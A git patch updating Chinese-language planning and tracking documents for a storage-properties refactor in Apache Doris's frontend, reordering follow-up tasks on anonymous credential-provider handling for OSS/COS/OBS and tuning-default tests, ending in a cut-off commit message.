aceb40c01b14fe..c71c1c9d553836 100644 --- a/plan-doc/metastore-storage-refactor/HANDOFF.md +++ b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -7,7 +7,7 @@ --- -**更新时间**:2026-06-17(实现 session:**FU-T01 完成** — HDFS typed BE model,R-007 闭环) +**更新时间**:2026-06-18(实现 session:**FU-T01 完成** — HDFS typed BE model,R-007 闭环;**+ 计划调整 D-011:P1-T06 之前先做 FU-T02[R-008]+FU-T03[R-006]**) **更新人**:Claude(Opus 4.8) ## 这次 session 完成了什么(FU-T01) @@ -33,27 +33,36 @@ - **R-007 已闭环**(HDFS typed BE model 落地)。typed BE 路现对 S3/OSS/COS/OBS/**HDFS** 全产 BE 键。 - ⚠️ **e2e/docker 未跑**(本 session 仅 compile + UT + 对抗 review)。 -## 下一步(明确):P1-T06(P1 验证收口) -> **务必先按顶部流程:读文档 + 对照真实代码 review 方案再动手。** +## 下一步(明确):先 FU-T02(R-008)+ FU-T03(R-006),再 P1-T06 +> **用户 2026-06-18 调整顺序(D-011)**:在 P1-T06 docker 之前先把 R-008 + R-006 处理掉,使 P1-T06 成为干净全绿验收(不带已知漂移)。 +> **务必先按顶部流程:读文档 + 对照真实代码 review 方案再动手;实施前 WORKFLOW §2 单任务 TDD + 一句话复述。** -**P1-T06**:paimon UT 全绿(已 293/0/1skip)+ docker `enablePaimonTest=true` **5 flavor**(filesystem/hms/rest/jdbc/dlf)+ vended(REST/DLF) + Kerberos HMS + **真 T1 等价闸 Option C**。 -- **FU-T01 已补 → HDFS-warehouse flavor(含 HA / kerberized HMS+HDFS)应转通过**(R-007 闭环验证点;之前是已接受回归)。 -- R-008(无凭据 OSS/COS/OBS 缺 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`)docker 会暴露 → **仍 FU-T02 独立**(超白名单)。 -- R-006(fe-filesystem 调优默认无 UT 守护)docker 兜底。 +**① FU-T02(R-008)— fe-filesystem OSS/COS/OBS 补 `AWS_CREDENTIALS_PROVIDER_TYPE`**(D-011 授权 `fe-filesystem-{oss,cos,obs}`): +- 给 `Oss/Cos/ObsFileSystemProperties` 加 `credentialsProviderType`(镜像 `S3FileSystemProperties`),`toBackendKv()`/`toMap()` 发 `AWS_CREDENTIALS_PROVIDER_TYPE`。**精确 parity** = ak/sk **皆空** → `ANONYMOUS`,否则**省略**(legacy OSS/COS/OBS 仅 blank-creds 才发,**非**无条件 `DEFAULT`;S3 typed 已有,故只补 OSS/COS/OBS)。 +- **现场 recon 必做**:对照 legacy fe-core `AbstractS3CompatibleProperties.doBuildS3Configuration`(:117-129) + `OSS/COS/OBSProperties`(均不 override `getAwsCredentialsProviderTypeForBackend` → blank-creds 返回 `ANONYMOUS`;仅 `S3Properties` override 恒非空)。**核对 S3FileSystemProperties `credentialsProviderType` 的现成实现**(字段/枚举 `S3CredentialsProviderType`/`getMode()` 是否在 fe-filesystem-s3 内、能否给 OSS/COS/OBS 复用,**若须移到 api/spi 共享 → 先 AskUserQuestion 扩白名单**)。 +- **TDD(UT 落地,参 FU-T01)**:无凭据 OSS/COS/OBS map → `toMap()` 含 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`(RED→GREEN);带 ak/sk 则不发/发 Simple 等价。 + +**② FU-T03(R-006)— fe-filesystem 调优默认 UT 断言**(D-011 授权 `fe-filesystem-{s3,oss,cos,obs}` test): +- 在 `S3/Oss/Cos/ObsFileSystemPropertiesTest` 加 **test-only** 断言:S3=50/3000/1000、OSS/COS/OBS=100/10000/10000(`toHadoopConfigurationMap` 的 `fs.s3a.connection.maximum` 等 + BE map `AWS_MAX_CONNECTIONS` 等)。**功能今日正确**(字段默认真发),本任务=补显式守护(mutation:改默认→测试红)。 +- **现场 recon**:核对各 `*FileSystemProperties` 的默认常量(S3 `DEFAULT_MAX_CONNECTIONS="50"` 等;OSS/COS/OBS 100/10000/10000 在哪——可能在各自 properties 或共享基类)+ 现有 test 已断言哪些(避免重复/漏)。 +- 纯 test additive,不动 main(除非与 FU-T02 共享改动)。 + +**③ 之后 P1-T06(P1 验证收口)**:paimon UT 全绿(已 293/0/1skip)+ docker `enablePaimonTest=true` **5 flavor**(filesystem/hms/rest/jdbc/dlf)+ vended(REST/DLF) + Kerberos HMS + **真 T1 等价闸 Option C**。 +- **FU-T01 补后 HDFS-warehouse flavor(含 HA / kerberized)应通过**(R-007 闭环验证点);**FU-T02 补后无凭据 OSS/COS/OBS 应通过**(R-008 闭环);R-006 由 FU-T03 UT 守护 → 干净全绿。 - **不部署 docker 则明确标「未跑 e2e」**(CLAUDE.md Rule 12)。 - 之后 P2(metastore SPI:P2-T01 新建 fe-connector-metastore-api …)+ P3a(fe-kerberos 叶子)。 ## 未决 / 需注意 - ✅ 已闭环:R-007(FU-T01)。 -- ❗ **R-008(已触发,用户接受类)**:fe-filesystem typed OSS/COS/OBS 缺 `AWS_CREDENTIALS_PROVIDER_TYPE`(无凭据 catalog 的 legacy `ANONYMOUS` 丢)。**follow-up FU-T02**(超白名单——`fe-filesystem-{oss,cos,obs}`)。 -- ❗ **R-006(confirm,需用户定夺)**:fe-filesystem 调优默认值无显式 UT 守护;docker P1-T06 兜底;fe-filesystem 加断言 follow-up(超白名单)。 +- 🔧 **R-008(修复中,D-011:P1-T06 前先修 = FU-T02 active-next)**:fe-filesystem typed OSS/COS/OBS 缺 `AWS_CREDENTIALS_PROVIDER_TYPE`(无凭据 catalog 的 legacy `ANONYMOUS` 丢)。已授权 `fe-filesystem-{oss,cos,obs}`,可 UT 落地。 +- 🔧 **R-006(修复中,D-011:P1-T06 前先修 = FU-T03 active-next)**:fe-filesystem 调优默认值无显式 UT 守护(功能正确,仅测试健壮性)。已授权 `fe-filesystem-{s3,oss,cos,obs}` test。 - 📌 **残留已知(非 FU-T01 引入,独立 FU)**:**oss-hdfs**(`oss://` warehouse + JindoFS)在 typed 路缺 oss 凭据键——P1-T04 已起(HDFS-family typed 缺口),彻底修需 fe-filesystem **OssHdfs typed model**(独立大动作,超白名单)。FU-T01 让 HDFS provider 对 bare-`oss://` fs.defaultFS 发无凭据 HDFS 键(review F3 MINOR,latent 误配曝露,非 working catalog 回归)。 - 📌 **scan-time 重 validate**:`getStorageProperties()` 每次 scan 经 `bindAll`→`bind()`→`of().validate()`(无 memoization)——valid catalog 内禀 dormant;是 typed-路通性(P1-T02/D-009),非 FU-T01 专有。 - ⚠️ e2e 全程未跑;P1-T06 前如不部署 docker,明确标「未跑 e2e」(CLAUDE.md Rule 12)。 ## 红线提醒(WORKFLOW §4) -- **可动**(白名单):`fe-connector-paimon/**`、`fe-connector-spi/**`、fe-core **仅** `connector/DefaultConnectorContext.java` + `fs/FileSystemPluginManager.java` + `fs/FileSystemFactory.java`(均**仅新增方法 / 对本项目所加方法的微改+注释**)、**`fe-filesystem/fe-filesystem-hdfs/**`(D-010 授权,仅 FU-T01)**、相关 pom、本跟踪目录。 -- **禁碰**:fe-core `datasource.property.{storage,metastore}` 包、构造点 `PluginDrivenExternalCatalog`、其它连接器(hive/hudi/iceberg/es/jdbc/mc/trino)、**其它 fe-filesystem 模块**(`-{api,spi,s3,oss,cos,obs,azure,broker,local}`,含其 test)、`fe-property` 模块删除。 +- **可动**(白名单):`fe-connector-paimon/**`、`fe-connector-spi/**`、fe-core **仅** `connector/DefaultConnectorContext.java` + `fs/FileSystemPluginManager.java` + `fs/FileSystemFactory.java`(均**仅新增方法 / 对本项目所加方法的微改+注释**)、**`fe-filesystem/fe-filesystem-hdfs/**`(D-010,FU-T01)**、**`fe-filesystem/fe-filesystem-{s3,oss,cos,obs}/**`(D-011,FU-T02/FU-T03;main+test)**、相关 pom、本跟踪目录。 +- **禁碰**:fe-core `datasource.property.{storage,metastore}` 包、构造点 `PluginDrivenExternalCatalog`、其它连接器(hive/hudi/iceberg/es/jdbc/mc/trino)、**其它 fe-filesystem 模块**(`-{api,spi,azure,broker,local}`,含其 test——R-008 若须给 api/spi 加共享 credentials-provider-type 须先 AskUserQuestion)、`fe-property` 模块删除。 - **FU-T01 额外触碰**(已记 D-010 + tasks,透明):fe-core `FileSystemFactory.java`(F1 +1 行 setProperty,项目 P1-T02 加的方法)、`FileSystemPluginManager.java`(bindAll javadoc,项目 P0-T02 加的方法)、fe-connector-paimon `PaimonScanPlanProvider.java`(注释)——均 project-owned 微改/注释,非碰 pre-existing fe-core 方法。 - paimon 连接器 + fe-filesystem-hdfs **允许** import `org.apache.doris.foundation.*`(fe-foundation 叶子)、`org.apache.doris.filesystem.*`;**禁** import fe-core/fe-connector(fe-filesystem 侧 gate)。 - 每次提交前 `git diff --name-only` 对照白名单。 diff --git a/plan-doc/metastore-storage-refactor/PROGRESS.md b/plan-doc/metastore-storage-refactor/PROGRESS.md index b6cadb43193684..ff031e12f5a93a 100644 --- a/plan-doc/metastore-storage-refactor/PROGRESS.md +++ b/plan-doc/metastore-storage-refactor/PROGRESS.md @@ -18,7 +18,11 @@ ## 当前活跃 task - **FU-T01 ✅ 完成(2026-06-17,D-010 授权,commit 待提交)**:给 `fe-filesystem-hdfs` 新建 HDFS typed BE model(`HdfsFileSystemProperties` + `HdfsConfigFileLoader` + provider bind),修复 P1-T04 的 HDFS BE 回归(DV-004/**R-007 闭环**)。移植源 = fe-property `HdfsProperties`(parity by construction);kerberos=K1(BE-key 字符串、不建 fe-kerberos);BE-only(不实现 HadoopStorageProperties)。验证:fe-filesystem-hdfs 全模块 **78/0**(含 25 golden parity;既有 create() 路零回归)+ checkstyle 0 + RED/GREEN(mutation) + fe-core 编译绿。**对抗 review `wf_5db99e32-2ad`(27 agent)**清场,3 实质修(malformed-uri fail-loud + 2 stale 注释 + 11 测试)+ **F1 接线**(config-dir sysprop 桥 `Config.hadoop_config_dir`,用户选「现在接好」)。⚠️ docker e2e 未跑。 -- **下一个:`P1-T06`**(P1 验证收口):paimon UT 全绿(已 293/0/1skip)+ docker `enablePaimonTest=true` 5 flavor(filesystem/hms/rest/jdbc/dlf)+ vended(REST/DLF) + Kerberos HMS;**真 T1 等价闸 Option C**;**FU-T01 已补 → HDFS flavor 应通过(R-007 已闭环)**。**若不部署 docker → 明确标「未跑 e2e」**(CLAUDE.md Rule 12)。 +- **下一步(用户 2026-06-18 调整顺序,D-011):先 `FU-T02`(R-008)+ `FU-T03`(R-006),再 `P1-T06`**。 + - **FU-T02(R-008)**:fe-filesystem `Oss/Cos/ObsFileSystemProperties` 补 `AWS_CREDENTIALS_PROVIDER_TYPE`(ak/sk 皆空→`ANONYMOUS` 精确 parity,镜像 S3)。 + - **FU-T03(R-006)**:`S3/Oss/Cos/ObsFileSystemPropertiesTest` 加调优默认 UT 断言(S3 50/3000/1000;OSS/COS/OBS 100/10000/10000)。 + - 两者均 D-011 授权触碰 `fe-filesystem-{s3,oss,cos,obs}`(白名单已 +);可 UT 落地(参 FU-T01)。 + - **再 `P1-T06`**(P1 验证收口):paimon UT 全绿(已 293/0/1skip)+ docker `enablePaimonTest=true` 5 flavor + vended + Kerberos HMS + **真 T1 闸 Option C**;FU-T01 补后 HDFS flavor 应通过、FU-T02 补后无凭据 OSS/COS/OBS 应通过 → **干净全绿验收**。不部署 docker 则标「未跑 e2e」(Rule 12)。 - P0-T01 ✅|P0-T02 ✅(bindAll)|P1-T01 ✅(getStorageProperties 默认方法 + 边)|P1-T02 ✅(getStorageProperties 实现 + FileSystemFactory accessor)|P1-T03 ✅(paimon storage 配置 `applyStorageConfig` 改走 `toHadoopConfigurationMap()`)|P1-T04 ✅(paimon BE 静态凭据改走 `getStorageProperties().toBackendProperties().toMap()`,全量切)|**P1-T05 ✅**(删 paimon→fe-property pom 依赖边 + grep 归零闸)。 - ✅ **连接器 storage + BE 凭据路全切 fe-filesystem-api typed,且 paimon→fe-property 依赖边已断**:catalog 路 `PaimonConnector.buildStorageHadoopConfig()→toHadoopConfigurationMap()`;BE 扫描分片路 `PaimonScanPlanProvider` 遍历 `getStorageProperties()→toBackendProperties().toMap()`→`location.*`(vended overlays static 保序不动)。paimon 已零 `org.apache.doris.property/datasource` import + pom 无 fe-property 依赖(fe-property 变 0 消费者孤儿,本次不物理删 D-005)。 - ⚠️ **已知接受回归(fe-filesystem typed BE model 不全,超 P1 白名单)**:HDFS-warehouse paimon BE 配置丢(DV-004/R-007/FU-T01);无凭据 OSS/COS/OBS 缺 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`(R-008/FU-T02)。均用户接受、follow-up 修、docker P1-T06 会暴露(非新 bug)。 diff --git a/plan-doc/metastore-storage-refactor/WORKFLOW.md b/plan-doc/metastore-storage-refactor/WORKFLOW.md index 1482fecc0b0c98..d0eb5f84ea0938 100644 --- a/plan-doc/metastore-storage-refactor/WORKFLOW.md +++ b/plan-doc/metastore-storage-refactor/WORKFLOW.md @@ -57,7 +57,8 @@ fe/fe-connector/fe-connector-spi/** (仅 ConnectorContext 新 fe/fe-core/src/main/java/.../connector/DefaultConnectorContext.java (仅新增 getStorageProperties) fe/fe-core/src/main/java/.../fs/FileSystemPluginManager.java (仅新增 bindAll;D-009/DV-001) fe/fe-core/src/main/java/.../fs/FileSystemFactory.java (仅新增 bindAllStorageProperties;D-009 二次确认) -fe/fe-filesystem/fe-filesystem-hdfs/** (FU-T01:HDFS typed BE model;D-010 授权局部解禁;其它 fe-filesystem 模块仍禁碰) +fe/fe-filesystem/fe-filesystem-hdfs/** (FU-T01:HDFS typed BE model;D-010 授权局部解禁) +fe/fe-filesystem/fe-filesystem-{s3,oss,cos,obs}/** (FU-T02 R-008 / FU-T03 R-006;D-011 授权;main+test;其它 fe-filesystem 模块[api,spi,azure,broker,local]仍禁碰) fe/fe-connector/pom.xml ; fe/pom.xml (仅新增模块声明) plan-doc/metastore-storage-refactor/** (本跟踪目录) ``` diff --git a/plan-doc/metastore-storage-refactor/decisions-log.md b/plan-doc/metastore-storage-refactor/decisions-log.md index f3a3e17d16f716..c641a55ae25959 100644 --- a/plan-doc/metastore-storage-refactor/decisions-log.md +++ b/plan-doc/metastore-storage-refactor/decisions-log.md @@ -5,6 +5,15 @@ --- +## D-011 — P1-T06 之前先处理 R-008 + R-006(授权触碰 fe-filesystem-{s3,oss,cos,obs}) +- **日期**:2026-06-18 | **决策者**:用户(「在做 p1-t06 之前,把 r-008 和 r-006 先处理掉」) +- **内容**:**调整实施顺序** = 先 **FU-T02(R-008)** + **FU-T03(R-006)**,再 **P1-T06**。授权本次**局部解禁**对象存储 typed 模块(原 D-005 / WORKFLOW §4.1 禁碰 fe-filesystem,D-010 仅放行 fe-filesystem-hdfs): + - **FU-T02(R-008)**:给 `fe-filesystem-{oss,cos,obs}` 的 `Oss/Cos/ObsFileSystemProperties` 补 `AWS_CREDENTIALS_PROVIDER_TYPE`(镜像 `S3FileSystemProperties`),**精确 parity** = ak/sk **皆空** → `ANONYMOUS`,否则**省略**(legacy OSS/COS/OBS 仅 blank-creds 才发 ANONYMOUS,**非**无条件 `DEFAULT`;S3 override 恒非空故 S3 typed 已有)。修无凭据 OSS/COS/OBS catalog 在带 IAM-role 云主机的凭据选择漂移。 + - **FU-T03(R-006)**:给 `S3/Oss/Cos/ObsFileSystemPropertiesTest` 加 **test-only** 调优默认断言(S3=50/3000/1000、OSS/COS/OBS=100/10000/10000),守护 P1-T03 删 paimon canonical 测试暴露的 fe-filesystem 测试缺口(**功能今日正确**,仅测试健壮性)。 + - 两者均纯新增/外科:**不动** fe-core 旧 storage 包、不动其它连接器、不动 fe-filesystem-{api,spi,hdfs,azure,broker,local}(除非 recon 证 R-008 须给 api/spi 加 credentials-provider-type 共享类型——届时再 AskUserQuestion 扩)。 +- **理由**:R-008/R-006 同源「fe-filesystem typed 对象存储模型对 legacy 不完整」,docker P1-T06 才会暴露 R-008(无凭据 OSS/COS/OBS);用户决定**在 P1-T06 docker 之前先补齐**,使 P1-T06 成为干净的全绿验收(而非带已知漂移)。FU-T01 已证 fe-filesystem 自有模块可写真 parity UT(非 paimon Option C),故 R-008/R-006 都能 UT 落地 + 与 S3 typed 对照。 +- **影响**:WORKFLOW §4.1 白名单 +`fe/fe-filesystem/fe-filesystem-{s3,oss,cos,obs}/**`(main + test;仅 FU-T02/FU-T03);tasks FU-T02 ⬜→ active-next、新增 **FU-T03**(R-006);risks R-008/R-006 状态「监控/已触发」→「修复中(P1-T06 前)」;实施顺序 P1-T06 后移到 FU-T02/FU-T03 之后。**实施前仍按 WORKFLOW §2:先 recon 真实代码 + 一句话复述 + TDD**(R-008 TDD:合成 OSS/COS/OBS 无凭据 map → `toBackendKv()` 应含 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS` 当 ak/sk 皆空,RED→GREEN;对照 legacy `AbstractS3CompatibleProperties` :117-129)。 + ## D-010 — 授权触碰 fe-filesystem-hdfs(FU-T01 HDFS typed BE model)+ kerberos 选 K1(不建 fe-kerberos) - **日期**:2026-06-17 | **决策者**:用户(确认设计 + AskUserQuestion 选 K1) - **内容**:授权本次**局部解禁** `fe-filesystem-hdfs`(原 D-005 / WORKFLOW §4.1 禁碰 fe-filesystem),把 **FU-T01 从 follow-up 提升为 active 任务**,修复 P1-T04 引入的 HDFS BE 配置回归(DV-004 / R-007)。范围: diff --git a/plan-doc/metastore-storage-refactor/risks.md b/plan-doc/metastore-storage-refactor/risks.md index 9d8b8cb3cc9126..b61fadb0937cb8 100644 --- a/plan-doc/metastore-storage-refactor/risks.md +++ b/plan-doc/metastore-storage-refactor/risks.md @@ -11,7 +11,7 @@ - **缓解(DV-003 修订)**:T1 自动逐键 UT **不可在单测落地**(fe-filesystem 对象存储 impl 是运行时插件,不在任何单测 classpath)→ 改为 **paimon connector-local 契约 UT**(storage map 叠加/last-write-wins/kerberos-ordering)+ **docker P1-T06 5-flavor 作真等价闸**;P0-T01 4-agent recon + DV-002 code-read 等价为依据。 - **触发判据**:docker P1-T06 任一 flavor 读私有桶 403 / 配置缺键。 -## R-006 — 调优默认值(tuning defaults)无显式 UT 守护(P1-T03 删 canonical 测试暴露的 fe-filesystem 测试缺口)| 状态:监控中 +## R-006 — 调优默认值(tuning defaults)无显式 UT 守护(P1-T03 删 canonical 测试暴露的 fe-filesystem 测试缺口)| 状态:修复中(2026-06-18 D-011:P1-T06 之前先修,FU-T03 active-next;授权 fe-filesystem-{s3,oss,cos,obs} test) - **描述**:P1-T03 删 paimon `buildHadoopConfigurationEmitsS3TuningDefaults` 等 canonical 测试(翻译职责移交 fe-filesystem)。对抗 review(`wf_76df09a4-c2f`)确认 + 直接核实:fe-filesystem `S3FileSystemPropertiesTest.toHadoopProperties_*` **不显式断言**调优默认值(`fs.s3a.connection.maximum=50`/`request.timeout=3000`/`timeout=1000`;line72 只设输入 `s3.connection.maximum=64` 非断默认),`Oss/Cos/ObsFileSystemPropertiesTest` 同样**零调优断言**(OSS/COS/OBS 默认 100/10000/10000)。**canonical 键翻译 + endpoint-from-region 派生 IS 已覆盖**(已核:`OssFileSystemPropertiesTest:108-110` region→`-internal` endpoint、Cos/Obs endpoint+creds),唯**调优默认值**裸奔。 - **影响**:**功能今日正确**(`S3FileSystemProperties.toHadoopConfigurationMap()` 经字段默认 `DEFAULT_MAX_CONNECTIONS="50"` 等真发,paimon `buildStorageHadoopConfig` 正确调用);但若未来改 fe-filesystem 误删某调优默认,**无 UT 报红**(仅 docker 运行期暴露)→ 测试健壮性回归。 - **缓解**:**docker P1-T06** 为运行期兜底;**建议 follow-up**(**超出当前 P1 白名单——fe-filesystem 禁碰**):在 `S3FileSystemPropertiesTest` + `Oss/Cos/ObsFileSystemPropertiesTest` 加调优默认断言(test-only additive)。在 fe-filesystem 收口/迁移批次或经用户批准的小补丁中做。**不在 paimon 重复断言**(Option C:paimon 无 fe-filesystem impl 于测试 classpath,合成 map 断言为同义反复,不守 fe-filesystem 默认)。 @@ -23,7 +23,7 @@ - **缓解**:**follow-up FU-T01**——给 `fe-filesystem-hdfs` 新建 `HdfsFileSystemProperties`(`implements BackendStorageProperties`,override `FileSystemProvider.bind`)让 `bindAll` 收集 HDFS 项、`toBackendProperties()` 产 BE 键。**过渡期 HDFS-warehouse paimon 为已知回归**(用户 2026-06-17 明确接受)。 - **触发判据**:docker P1-T06 HDFS-backed flavor 读失败(**已知、非新 bug**;须与真新回归区分)。 -## R-008 — fe-filesystem typed OSS/COS/OBS BE map 缺 AWS_CREDENTIALS_PROVIDER_TYPE(无凭据 catalog 的 ANONYMOUS 漂移)| 状态:已触发(用户接受类,待 follow-up FU-T02 修) +## R-008 — fe-filesystem typed OSS/COS/OBS BE map 缺 AWS_CREDENTIALS_PROVIDER_TYPE(无凭据 catalog 的 ANONYMOUS 漂移)| 状态:修复中(2026-06-18 D-011:P1-T06 之前先修,FU-T02 active-next;授权 fe-filesystem-{oss,cos,obs}) - **描述(P1-T04 对抗 review `wf_09745716-d48` confirm MAJOR)**:fe-filesystem `Oss/Cos/ObsFileSystemProperties.toBackendKv()` **不发** `AWS_CREDENTIALS_PROVIDER_TYPE`(无该字段);legacy fe-core `AbstractS3CompatibleProperties.doBuildS3Configuration`(:117-120) 在 `getAwsCredentialsProviderTypeForBackend()` 非空时发,OSS/COS/OBS 基类(:124-129) 在 **ak/sk 皆空**时返回 `ANONYMOUS`(OSSProperties/COSProperties/OBSProperties 均不 override,仅 S3Properties override 恒非空)。S3 typed 路**有**该键(`S3FileSystemProperties:260`)。P1-T04 把 paimon BE 凭据切到 typed 路 → **无凭据 OSS/COS/OBS catalog 不再发 ANONYMOUS**。 - **影响**:仅影响**无静态 ak/sk** 的 OSS/COS/OBS catalog(有 ak/sk 不受影响——两路都发 ak/sk → BE 短路 SimpleAWSCredentialsProvider)。BE `aws_credentials_provider_version=v2` 默认下,缺该键 → `CredProviderType::Default` → `CustomAwsCredentialsProviderChain`(探 WebIdentity/ECS/EC2 instance profile/... 最后才 anonymous)。故在带 **IAM role 的 EC2/ECS 主机**上,新路会**误取 instance 凭据**而非 anonymous + 元数据探测延迟;纯公开桶最终仍 anonymous 成功(**非硬失败**)。 - **缓解**:**follow-up FU-T02**——给 fe-filesystem `Oss/Cos/ObsFileSystemProperties` 加 `credentialsProviderType`(镜像 `S3FileSystemProperties`),**精确 parity**=ak/sk 皆空时发 `ANONYMOUS`、否则省略(**非**无条件 DEFAULT)。超 P1 白名单(fe-filesystem 禁碰),与 FU-T01 同批/经用户批准。过渡期已知漂移。 diff --git a/plan-doc/metastore-storage-refactor/tasks.md b/plan-doc/metastore-storage-refactor/tasks.md index 42ebd39921c788..3567349368190d 100644 --- a/plan-doc/metastore-storage-refactor/tasks.md +++ b/plan-doc/metastore-storage-refactor/tasks.md @@ -135,10 +135,17 @@ - **依赖**:P1-T04(暴露缺口)。**D-010 授权**触碰 `fe-filesystem-hdfs`。**红线**:核心改 `fe-filesystem-hdfs/**`;F1 接线 + stale-注释 另碰 3 个已白名单文件(均 project-owned 方法体微改/注释):fe-core `FileSystemFactory.java`(+1 行 setProperty)、`FileSystemPluginManager.java`(bindAll javadoc)、fe-connector-paimon `PaimonScanPlanProvider.java`(注释);其它 fe-filesystem 模块仍禁碰。 - **完成态(2026-06-17,commit 待提交)**:新建 `HdfsFileSystemProperties`(`FileSystemProperties + BackendStorageProperties`,BE-only)+ `HdfsConfigFileLoader`(XML 资源,sysprop 接 `Config.hadoop_config_dir`);`HdfsFileSystemProvider` re-type + `bind()`/`create(P)`(`create(Map)`/`supports()` 不动);pom +`fe-foundation`+`commons-lang3`。**移植源 = fe-property `HdfsProperties`,parity by construction**。验证:fe-filesystem-hdfs 全模块 **78/0/0**(含新增 25 golden parity;既有 25 `DFSFileSystemTest` 等绿=create() 路零回归)、checkstyle 0、RED/GREEN 经 mutation 证、fe-core `-pl fe-core -am compile` 绿(验 FileSystemFactory/PluginManager 改)、`git diff` 白名单干净。**对抗 review `wf_5db99e32-2ad`(27 agent,4 lens+verify)**:清场 packaging/parity/scope,3 实质修(malformed-uri fail-loud + 2 stale 注释 + 11 测试),**F1 用户选「现在接好」**(config-dir sysprop 桥)。残留 oss-hdfs JindoFS 凭据=独立 FU(P1-T04 已起)。⚠️ **docker e2e 未跑**(HA/kerberized HDFS-warehouse 真闸在 P1-T06)。 -### FU-T02 ⬜(follow-up,本次不做)给 fe-filesystem OSS/COS/OBS 补 AWS_CREDENTIALS_PROVIDER_TYPE(修 R-008) -- **做什么**:给 `Oss/Cos/ObsFileSystemProperties` 加 `credentialsProviderType` 字段 + 在 `toBackendKv()` 发 `AWS_CREDENTIALS_PROVIDER_TYPE`,**精确镜像 legacy**(ak/sk 皆空 → `ANONYMOUS`,否则**省略**——legacy OSS/COS/OBS 仅 blank-creds 才发,非无条件)。 -- **验收**:无凭据 OSS/COS/OBS catalog 的 typed BE map 与 legacy 等价(含 `ANONYMOUS`);有凭据零变化;docker 覆盖(含 IAM-role 主机场景)。 -- **依赖**:P1-T04(暴露缺口,对抗 review `wf_09745716-d48`)。**范围外**:动 `fe-filesystem-{oss,cos,obs}`(超 P1 白名单——fe-filesystem 禁碰),与 FU-T01 同批/经用户批准。 +### FU-T02 🔜(active-next — 用户 2026-06-18 提前 + D-011 授权;排在 P1-T06 之前)给 fe-filesystem OSS/COS/OBS 补 AWS_CREDENTIALS_PROVIDER_TYPE(修 R-008) +- **做什么**:给 `Oss/Cos/ObsFileSystemProperties` 加 `credentialsProviderType` 字段(镜像 `S3FileSystemProperties`)+ 在 `toBackendKv()` 发 `AWS_CREDENTIALS_PROVIDER_TYPE`,**精确镜像 legacy**(ak/sk 皆空 → `ANONYMOUS`,否则**省略**——legacy OSS/COS/OBS 仅 blank-creds 才发 ANONYMOUS,非无条件 `DEFAULT`;S3 override 恒非空)。 +- **TDD(可 UT 落地,参 FU-T01)**:合成无凭据 OSS/COS/OBS map → `toBackendProperties().toMap()` 应含 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`(RED→GREEN);带 ak/sk 则不发该键(或发 SimpleAWS-等价,对照 legacy `AbstractS3CompatibleProperties.doBuildS3Configuration` :117-129 + 各 `OSS/COS/OBSProperties` 不 override `getAwsCredentialsProviderTypeForBackend`)。 +- **验收**:无凭据 OSS/COS/OBS typed BE map 与 legacy 等价(含 `ANONYMOUS`);有凭据零变化;UT 与 S3 typed 对照;checkstyle 0;`git diff` 仅落 `fe-filesystem-{oss,cos,obs}/**`(recon 若证须 api/spi 共享类型则先 AskUserQuestion)。 +- **依赖**:P1-T04(暴露缺口,对抗 review `wf_09745716-d48`)。**D-011 授权**触碰 `fe-filesystem-{oss,cos,obs}`(白名单已 +)。**先做(与 FU-T03 一道)再 P1-T06。** + +### FU-T03 🔜(active-next — 用户 2026-06-18 + D-011 授权;排在 P1-T06 之前)给 fe-filesystem S3/OSS/COS/OBS 加调优默认 UT 断言(修 R-006) +- **做什么**:在 `S3/Oss/Cos/ObsFileSystemPropertiesTest` 加 **test-only** 断言守护调优默认值:S3=`fs.s3a.connection.maximum=50`/`request.timeout=3000`/`timeout=1000`(BE `AWS_MAX_CONNECTIONS=50` 等)、OSS/COS/OBS=`100/10000/10000`。守 P1-T03 删 paimon canonical tuning 测试暴露的 fe-filesystem 测试缺口。 +- **TDD**:断言 `toHadoopConfigurationMap()` / `toBackendProperties().toMap()` 在不显式设调优键时发各自默认值(mutation:改 fe-filesystem 字段默认 → 测试应红)。**功能今日正确**(字段默认真发),本任务=补显式 UT 守护。 +- **验收**:4 个 `*FileSystemPropertiesTest` 各含调优默认断言(S3 50/3000/1000;OSS/COS/OBS 100/10000/10000);checkstyle 0;纯 test additive,不动 main(除非 R-006 与 FU-T02 共享改动);`git diff` 仅落 `fe-filesystem-{s3,oss,cos,obs}/src/test/**`。 +- **依赖**:P1-T03(删 canonical 测试暴露,对抗 review `wf_76df09a4-c2f`)。**D-011 授权**。**先做(与 FU-T02 一道)再 P1-T06。** ## 阶段日志(append-only) - 2026-06-17:创建任务清单(P0×2 / P1×6 / P2×5),状态全 ⬜,待用户批准后开始 P1。 From e5b088b14e7238c33670fd7cc82ee10991f87a0a Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 18 Jun 2026 04:25:16 +0800 Subject: [PATCH 086/128] [FU-T02] fe-filesystem-{oss,cos,obs}: emit AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS for credential-less catalogs (R-008) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit P1-T04 switched paimon BE static credentials to the typed getStorageProperties().toBackendProperties().toMap() path. The typed OSS/COS/OBS BE map omitted AWS_CREDENTIALS_PROVIDER_TYPE, so a catalog with no static AK/SK lost the legacy ANONYMOUS hint — on IAM-role cloud hosts BE would probe instance credentials instead of going anonymous. Restore exact legacy parity by mirroring fe-core AbstractS3CompatibleProperties.doBuildS3Configuration (storage/:117-120): emit AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS only when both access key and secret key are blank, otherwise omit it (BE uses SimpleAWSCredentialsProvider). Inlined in each toBackendKv() — no configurable field/enum, because legacy OSS/COS/OBS never override getAwsCredentialsProviderTypeForBackend() (only S3Properties does) and fe-filesystem-{oss,cos,obs} do not depend on fe-filesystem-s3's S3CredentialsProviderType (see DV-005). BE map only; the Hadoop config map is untouched, matching legacy (key is backend-config-only). TDD: 3 new toBackendProperties_emitsAnonymousProviderTypeWhenNoStaticCredentials (RED expected but was -> GREEN) + assertNull guards on the credentialed tests. OSS 13/0, COS 12/0, OBS 12/0 + sibling tests green; checkstyle 0 violations. Docker e2e not run (P1-T06 gate). Co-Authored-By: Claude Opus 4.8 (1M context) --- .../filesystem/cos/CosFileSystemProperties.java | 6 ++++++ .../cos/CosFileSystemPropertiesTest.java | 15 +++++++++++++++ .../filesystem/obs/ObsFileSystemProperties.java | 6 